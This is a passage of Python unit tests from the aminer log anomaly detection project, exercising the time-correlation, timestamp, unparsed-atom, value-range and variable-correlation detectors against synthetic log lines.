time!\n\n\n' _expected_string_different_attributes = _expected_string + '"%s" (%s) %d is not equal %d\n\n\n' model = '/model' datetime_format_string = '%Y-%m-%d %H:%M:%S' service_children1 = [ FixedDataModelElement('Value1Key', b'Value1: '), FixedDataModelElement('Value1Value', b'fixed Value1'), FixedDataModelElement('Value2Key', b', Value2: '), DecimalIntegerValueModelElement('Value2Value'), FixedDataModelElement('Value3Key', b', Value3: '), FixedDataModelElement('Value3Value', b'fixed Value3'), FixedDataModelElement('Value4Key', b', Value4: '), FixedDataModelElement('Value4Value', b'fixed Value4')] service_children2 = [ FixedDataModelElement('Value1Key', b'Value1: '), FixedDataModelElement('Value1Value', b'fixed Value1'), FixedDataModelElement('Value2Key', b', Value2: '), FixedDataModelElement('Value2Value', b'fixed Value2'), FixedDataModelElement('Value3Key', b', Value3: '), DecimalIntegerValueModelElement('Value3Value'), FixedDataModelElement('Value4Key', b', Value4: '), FixedDataModelElement('Value4Value', b'fixed Value4')] match_context1 = MatchContext(b'Value1: fixed Value1, Value2: 22500, Value3: fixed Value3, Value4: fixed Value4') match_context2 = MatchContext(b'Value1: fixed Value1, Value2: fixed Value2, Value3: 22500, Value4: fixed Value4') match_context2_different = MatchContext(b'Value1: fixed Value1, Value2: fixed Value2, Value3: 22501, Value4: fixed Value4') seq1 = SequenceModelElement('sequence1', service_children1) seq2 = SequenceModelElement('sequence2', service_children2) match_element1 = seq1.get_match_element(model, match_context1) match_element2 = seq2.get_match_element(model, match_context2) match_element2_different = seq2.get_match_element(model, match_context2_different) def setUp(self): """Set up the rules for the TimeCorrelationViolationDetector.""" TestBase.setUp(self) self.correlation_rule = CorrelationRule('Correlation', 1, 1.2, artefact_match_parameters=[ ('/model/sequence1/Value2Value', '/model/sequence2/Value3Value')]) self.a_class_selector = EventClassSelector('Selector1', [self.correlation_rule], None) self.b_class_selector = EventClassSelector('Selector2', None, [self.correlation_rule]) self.rules = [] self.rules.append(Rules.PathExistsMatchRule('/model/sequence1/Value2Key', self.a_class_selector)) self.rules.append(Rules.PathExistsMatchRule('/model/sequence2/Value3Key', self.b_class_selector)) def test1_check_status_ok(self): """ In this test case the status is OK after receiving the expected data and no error message is returned. The output of the do_timer-method is also tested in this test case. """ description = "Test1TimeCorrelationViolationDetector" time_correlation_violation_detector = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, self.rules, [self.stream_printer_event_handler]) self.analysis_context.register_component(time_correlation_violation_detector, component_name=description) log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), time.time(), self) time_correlation_violation_detector.receive_atom(log_atom1) log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), time.time() + 1, self) time_correlation_violation_detector.receive_atom(log_atom2) time_correlation_violation_detector.do_timer(time.time()) self.assertEqual(self.output_stream.getvalue(), "") def test2_check_status_not_found_error(self): """ In this test case the second log line is not found and an appropriate error message is expected from the check_status-method. The output of the do_timer-method is also tested in this test case. """ description = "Test2TimeCorrelationViolationDetector" time_correlation_violation_detector = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, self.rules, [self.stream_printer_event_handler]) self.analysis_context.register_component(time_correlation_violation_detector, component_name=description) t = time.time() log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), t, self) time_correlation_violation_detector.receive_atom(log_atom1) r = self.correlation_rule.check_status(t + 2) self.assertEqual(r[0], 'FAIL: B-Event for "%s" (%s) was not found in time!\n' % ( self.match_element1.get_match_string().decode(), self.a_class_selector.action_id)) def test3_check_status_before_expected_timespan(self): """ In this test case the second log line is found too early. An appropriate error message is expected from the check_status-method. The output of the do_timer-method is also tested in this test case. """ description = "Test3TimeCorrelationViolationDetector" time_correlation_violation_detector = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, self.rules, [self.stream_printer_event_handler]) self.analysis_context.register_component(time_correlation_violation_detector, component_name=description) t = time.time() log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), t, self) time_correlation_violation_detector.receive_atom(log_atom1) log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), time.time(), self) time_correlation_violation_detector.receive_atom(log_atom2) time_correlation_violation_detector.do_timer(time.time()) self.assertEqual(self.output_stream.getvalue(), self._expected_string_too_early % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), self.correlation_rule.rule_id, description, 1, self.match_element1.get_match_string().decode(), self.a_class_selector.action_id)) def test4_check_status_after_expected_timespan(self): """ In this test case the second log line is found too late. An appropriate error message is expected from the check_status-method. The output of the do_timer-method is also tested in this test case. """ description = "Test4TimeCorrelationViolationDetector" time_correlation_violation_detector = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, self.rules, [self.stream_printer_event_handler]) self.analysis_context.register_component(time_correlation_violation_detector, component_name=description) t = time.time() log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), t, self) time_correlation_violation_detector.receive_atom(log_atom1) log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t + 5, self) time_correlation_violation_detector.receive_atom(log_atom2) time_correlation_violation_detector.do_timer(time.time()) self.assertEqual(self.output_stream.getvalue(), self._expected_string_too_late % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), self.correlation_rule.rule_id, description, 1, self.match_element1.get_match_string().decode(), self.a_class_selector.action_id)) def test5_check_status_attributes_not_matching(self): """ In this test case the second log line has different attributes than expected. An appropriate error message is expected from the check_status-method. The output of the do_timer-method is also tested in this test case. """ description = "Test5TimeCorrelationViolationDetector" time_correlation_violation_detector = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, self.rules, [self.stream_printer_event_handler]) self.analysis_context.register_component(time_correlation_violation_detector, component_name=description) t = time.time() log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), t, self) time_correlation_violation_detector.receive_atom(log_atom1) log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2_different), t + 1, self) time_correlation_violation_detector.receive_atom(log_atom2) time_correlation_violation_detector.do_timer(time.time()) self.assertEqual(self.output_stream.getvalue(), self._expected_string_different_attributes % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), self.correlation_rule.rule_id, description, 1, self.match_element1.get_match_string().decode(), self.a_class_selector.action_id, 22500, 22501)) def test6_prepare_history_entry(self): """ In this test case the prepare_history_entry-method is tested with multiple artefact_match_parameters. Also the case of not finding a parameter is tested. """ t = time.time() p1 = ParserMatch(self.match_element1) p2 = ParserMatch(self.match_element2) log_atom1 = LogAtom(self.match_context1.match_data, p1, t, self) log_atom2 = LogAtom(self.match_context2.match_data, p2, t + 5, self) result = self.correlation_rule.prepare_history_entry(self.a_class_selector, log_atom1) self.assertEqual(result, [t, 0, self.a_class_selector, p1, 22500]) result = self.correlation_rule.prepare_history_entry(self.b_class_selector, log_atom2) self.assertEqual(result, [t + 5, 0, self.b_class_selector, p2, 22500]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/TimestampCorrectionFiltersTest.py000066400000000000000000000040241437606560100323450ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust from time import time from unit.TestBase import TestBase from datetime import datetime class TimestampCorrectionFiltersTest(TestBase): """Unittests for the TimestampCorrectionFilters.""" __expected_string = '%s New path(es) detected\n%s: "%s" (%d lines)\n %s\n pid=\n\n' match_path = "['match/s1']" def test1simple_monotonic_timestamp_adjust_test(self): """This test case checks if the timestamp is adjusted and logAtoms are forwarded correctly.""" description = "Test1TimestampCorrectionFilter" match_context_fixed_dme = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) t = time() new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector, description) simple_monotonic_timstamp_adjust = SimpleMonotonicTimestampAdjust([new_match_path_detector], False) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) self.assertEqual(simple_monotonic_timstamp_adjust.receive_atom(log_atom_fixed_dme), True) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), new_match_path_detector.__class__.__name__, description, 1, self.match_path)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/TimestampsUnsortedDetectorTest.py000066400000000000000000000136341437606560100323740ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from time import time from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from unit.TestBase import TestBase from datetime import datetime class TimestampsUnsortedDetectorTest(TestBase): """Unittests for the TimestampsUnsortedDetector.""" __expected_string = '%s Timestamp %s below %s\n%s: "%s" (%d lines)\n %s\n\n' pid = b' pid=' datetime_format_string = '%Y-%m-%d %H:%M:%S' def test1timestamp_lower_than_last_timestamp(self): """This test case checks if an event is created, when the timestamp is lower than the last one.""" description = "Test1TimestampsUnsortedDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) timestamp_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], False, output_logline=False) self.analysis_context.register_component(timestamp_unsorted_detector, description + "2") self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') log_atom.set_timestamp(t - 10000) self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t - 10000).strftime(self.datetime_format_string), datetime.fromtimestamp(t - 10000).strftime(self.datetime_format_string), datetime.fromtimestamp(t).strftime(self.datetime_format_string), timestamp_unsorted_detector.__class__.__name__, description + "2", 1, " pid=")) def test2timestamp_lower_than_last_timestamp_exit_on_error(self): """This test case checks if the program exits, when the timestamp is lower than the last one and the exitOnError flag is set.""" description = "Test2TimestampsUnsortedDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) timestamp_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], True, output_logline=False) self.analysis_context.register_component(timestamp_unsorted_detector, description + "2") self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') log_atom.set_timestamp(t - 10000) with self.assertRaises(SystemExit) as cm: timestamp_unsorted_detector.receive_atom(log_atom) self.assertEqual(cm.exception.code, 1) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t - 10000).strftime(self.datetime_format_string), datetime.fromtimestamp(t - 10000).strftime(self.datetime_format_string), datetime.fromtimestamp(t).strftime(self.datetime_format_string), timestamp_unsorted_detector.__class__.__name__, description + "2", 1, " pid=")) def test3timestamp_higher_than_last_timestamp(self): """This test case checks if nothing happens, when the timestamp is, as expected, higher than the last one.""" description = "Test3TimestampsUnsortedDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) timestamp_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], False, output_logline=False) self.analysis_context.register_component(timestamp_unsorted_detector, description + "2") self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') log_atom.set_timestamp(t) self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') log_atom.set_timestamp(t + 10000) self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/UnparsedAtomHandlersTest.py000066400000000000000000000064641437606560100311160ustar00rootroot00000000000000import unittest from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from time import time from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchContext import MatchContext from aminer.input.LogAtom import LogAtom from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler from unit.TestBase import TestBase class SimpleUnparsedAtomHandlerTest(TestBase): """Unittests for the SimpleUnparsedAtomHandler.""" calculation = b'256 * 2 = 512' def test1_atom_is_unparsed(self): """The atom in this test case has a ParserMatch.""" description = "Test1SimpleUnparsedAtomHandler" any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), time(), new_match_path_detector1) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) self.analysis_context.register_component(simple_unparsed_atom_handler, description) self.assertTrue(not simple_unparsed_atom_handler.receive_atom(log_atom)) def test2_atom_is_parsed(self): """The atom in this test case has no ParserMatch.""" description = "Test2SimpleUnparsedAtomHandler" any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, None, time(), new_match_path_detector1) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) self.analysis_context.register_component(simple_unparsed_atom_handler, description) self.assertTrue(simple_unparsed_atom_handler.receive_atom(log_atom)) def test3_parser_match_is_other_element(self): """In this test case the ParserMatch actually is no instance of ParserMatch. The atom should still be considered to be parsed.""" description = "Test3SimpleUnparsedAtomHandler" any_byte_data_model_element = AnyByteDataModelElement('a1') new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) match_context = MatchContext(self.calculation) match_element = any_byte_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, any_byte_data_model_element, time(), new_match_path_detector1) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) self.analysis_context.register_component(simple_unparsed_atom_handler, description) self.assertTrue(not simple_unparsed_atom_handler.receive_atom(log_atom)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/ValueRangeDetectorTest.py000066400000000000000000000242771437606560100305600ustar00rootroot00000000000000import unittest from aminer.analysis.ValueRangeDetector import ValueRangeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomaly = None # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomaly = evdat class ValueRangeDetectorTest(TestBase): """Unittests for the ValueRangeDetectorDetector.""" def test1_normal_sequence_detection(self): """ This test case checks the normal detection of new value ranges. The VRD is used to learn intervals and detect values outside of these ranges for two different identifiers. """ description = "Test1ValueRangeeDetector" # Initialize detector test_handler = TestHandler() value_range_detector = ValueRangeDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 'Default', True, False) self.analysis_context.register_component(value_range_detector, description) # Prepare log atoms that represent two entities (id) with floats (value). Anomalies are generated when ranges are first established. # Then, one identifier (a) has a valid value, while the other one (b) has a value outside of the range that generates an anomaly. # The following events are generated: # id: a value: 2.5 # id: b value: 5 # id: a value: 4.75 # id: b value: 6.3 # id: a value: 4.25 # id: b value: 3.1 m_1 = MatchElement('/model/id', b'a', b'a', None) m_2 = MatchElement('/model/value', b'2.5', 2.5, None) match_element_1 = MatchElement('/model', b'a2.5', b'a2.5', [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b'a2.5', parser_match_1, 1, None) m_3 = MatchElement('/model/id', b'b', b'b', None) m_4 = MatchElement('/model/value', b'5', 5, None) match_element_2 = MatchElement('/model', b'b5', b'b5', [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b'b5', parser_match_2, 2, None) m_5 = MatchElement('/model/id', b'a', b'a', None) m_6 = MatchElement('/model/value', b'4.75', 4.75, None) match_element_3 = MatchElement('/model', b'a4.75', b'a4.75', [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b'a4.75', parser_match_3, 3, None) m_7 = MatchElement('/model/id', b'b', b'b', None) m_8 = MatchElement('/model/value', b'6.3', 6.3, None) match_element_4 = MatchElement('/model', b'b6.3', b'b6.3', [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b'b6.3', parser_match_4, 4, None) m_9 = MatchElement('/model/id', b'a', b'a', None) m_10 = MatchElement('/model/value', b'4.25', 4.25, None) match_element_5 = MatchElement('/model', b'a4.25', b'a4.25', [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b'a4.25', parser_match_5, 5, None) m_11 = MatchElement('/model/id', b'b', b'b', None) m_12 = MatchElement('/model/value', b'3.1', 3.1, None) match_element_6 = MatchElement('/model', b'b3.1', b'b3.1', [m_11, m_12]) parser_match_6 = ParserMatch(match_element_6) log_atom_6 = LogAtom(b'b3.1', parser_match_6, 6, None) # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: 2.5 # Expected output: None value_range_detector.receive_atom(log_atom_1) self.assertIsNone(test_handler.anomaly) # First value of id (b) should not generate an anomaly # Input: id: b value: 5 # Expected output: None value_range_detector.receive_atom(log_atom_2) self.assertIsNone(test_handler.anomaly) # Second value of id (a) should generate an anomaly for new range # Input: id: a value: 4.75 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_3) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [4.75], 'IDpaths': ['/model/id'], 'IDvalues': ['a'], 'Range': [2.5, 2.5]}}) test_handler.anomaly = None # Second value of id (b) should generate an anomaly for new range # Input: id: b value: 6.3 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_4) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [6.3], 'IDpaths': ['/model/id'], 'IDvalues': ['b'], 'Range': [5, 5]}}) test_handler.anomaly = None # Third value of id (a) is in expected range, thus no anomaly is generated # Input: id: a value: 4.25 # Expected output: None value_range_detector.receive_atom(log_atom_5) self.assertIsNone(test_handler.anomaly) # Third value of id (b) is outside of expected range, thus anomaly is generated value_range_detector.receive_atom(log_atom_6) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [3.1], 'IDpaths': ['/model/id'], 'IDvalues': ['b'], 'Range': [5, 6.3]}}) test_handler.anomaly = None def test2_do_persist(self): """Test if learned ranges are persisted and loaded successfully.""" description = "Test2ValueRangeeDetector" # Initialize detector test_handler = TestHandler() value_range_detector = ValueRangeDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 'Default', True, False) self.analysis_context.register_component(value_range_detector, description) # Prepare log atoms that represent two entities (id) with floats (value). Anomalies are generated when ranges are first established. # Then, one identifier (a) has a valid value, while the other one (b) has a value outside of the range that generates an anomaly. # The following events are generated: # id: a value: 2.5 # id: b value: 5 # id: a value: 4.75 # id: b value: 6.3 # id: a value: 4.25 # id: b value: 3.1 m_1 = MatchElement('/model/id', b'a', b'a', None) m_2 = MatchElement('/model/value', b'2.5', 2.5, None) match_element_1 = MatchElement('/model', b'a2.5', b'a2.5', [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b'a2.5', parser_match_1, 1, None) m_3 = MatchElement('/model/id', b'b', b'b', None) m_4 = MatchElement('/model/value', b'5', 5, None) match_element_2 = MatchElement('/model', b'b5', b'b5', [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b'b5', parser_match_2, 2, None) m_5 = MatchElement('/model/id', b'a', b'a', None) m_6 = MatchElement('/model/value', b'4.75', 4.75, None) match_element_3 = MatchElement('/model', b'a4.75', b'a4.75', [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b'a4.75', parser_match_3, 3, None) m_7 = MatchElement('/model/id', b'b', b'b', None) m_8 = MatchElement('/model/value', b'6.3', 6.3, None) match_element_4 = MatchElement('/model', b'b6.3', b'b6.3', [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b'b6.3', parser_match_4, 4, None) m_9 = MatchElement('/model/id', b'a', b'a', None) m_10 = MatchElement('/model/value', b'4.25', 4.25, None) match_element_5 = MatchElement('/model', b'a4.25', b'a4.25', [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b'a4.25', parser_match_5, 5, None) m_11 = MatchElement('/model/id', b'b', b'b', None) m_12 = MatchElement('/model/value', b'3.1', 3.1, None) match_element_6 = MatchElement('/model', b'b3.1', b'b3.1', [m_11, m_12]) parser_match_6 = ParserMatch(match_element_6) log_atom_6 = LogAtom(b'b3.1', parser_match_6, 6, None) value_range_detector.receive_atom(log_atom_1) value_range_detector.receive_atom(log_atom_2) value_range_detector.receive_atom(log_atom_3) value_range_detector.receive_atom(log_atom_4) value_range_detector.receive_atom(log_atom_5) value_range_detector.receive_atom(log_atom_6) value_range_detector.do_persist() value_range_detector1 = ValueRangeDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 'Default', True, False) self.assertEqual(value_range_detector.ranges_min, value_range_detector1.ranges_min) self.assertEqual(value_range_detector.ranges_max, value_range_detector1.ranges_max) self.assertEqual(value_range_detector1.ranges_min, {('a',): 2.5, ('b',): 3.1}) self.assertEqual(value_range_detector1.ranges_max, {('a',): 4.75, ('b',): 6.3}) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/VariableCorrelationDetectorTest.py000066400000000000000000001544121437606560100324510ustar00rootroot00000000000000from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.VariableTypeDetector import VariableTypeDetector from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase from time import time import random from copy import deepcopy class VariableCorrelationDetectorTest(TestBase): """This class containts unittests for the VariableCorrelationDetector.""" # Number of execution of the tested function iterations = 20 # Size of the initial datasample dataset_size = 100 # Significance level significance_niveau = 0.05 def test1filter_variables_with_vtd(self): """This test case checks if the variables are filtered accurately using the VariableTypeDetector.""" self.filter_variables(True) def test2filter_variables_without_vtd(self): """This test case checks if the variables are filtered accurately without using the VariableTypeDetector.""" self.filter_variables(False) def filter_variables(self, use_vtd): """Run the filter variables code with or without the VariableTypeDetector.""" t = time() stat_data = b'5.3.0-55-generic' log_atom = LogAtom(stat_data, ParserMatch(MatchElement(None, stat_data, stat_data, None)), t, self.__class__.__name__) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for _ in range(self.dataset_size): etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in static data. self.assertEqual(vcd.pos_var_val, [[]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=False, sim_thres=0.5, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for i in range(self.dataset_size): stat_data = bytes(str((i % 60) * 0.1), 'utf-8') log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in others data. self.assertEqual(vcd.pos_var_val, [[]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) values_set = list(set(values)) # the vcd should learn any correlations in discrete data. self.assertEqual(vcd.pos_var_val, [[values_set]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 11) * 0.1), 'utf-8') values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(None, stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations if the discrete data is not in the threshold. self.assertEqual(vcd.pos_var_val, [[]]) def test3initialize_variables_with_matchDiscDistr_preselection_method(self): """This test case checks the functionality of the matchDiscDistr preselection method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values_list1 = [1.0/10]*10 values_list2 = [1.0/14]*14 # an correlation should be detected even if the second list contains more values than the first. self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) values_list2 = [1.0/7]*7 # an correlation should be detected even if the second list contains less values than the first. self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) values_list2 = [1.0/30]*30 # an correlation should not be detected if the probability of occurrence difference is too high. self.assertFalse(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) values_list2 = [0.2] + [0.8/9]*9 # an correlation should not be detected if the probability of occurrence difference is too high. self.assertFalse(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) # find correlations even when the lists are randomly shuffled. values_list1 = [0.3]*2 + [0.4/3]*3 values_list2 = [1.0/5] * 5 random.shuffle(values_list1) self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) def test4initialize_variables_with_excludeDueDistr_preselection_method(self): """This test case checks the functionality of the excludeDueDistr preselection method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) # equal distribution - no exclusion expected values = [0.1]*10 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) # almost equal distribution - no exclusion expected values = [0.3] + [0.078]*9 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) # one value with high probability - exclusion expected values = [0.5] + [0.056]*9 self.assertFalse(vcd.pick_cor_exclude_due_distr(values)) # multiple values with high probability - no exclusion expected values = [0.3]*3 + [0.014]*7 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) # check boundaries values = [0.5]*2 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) values = [0.8, 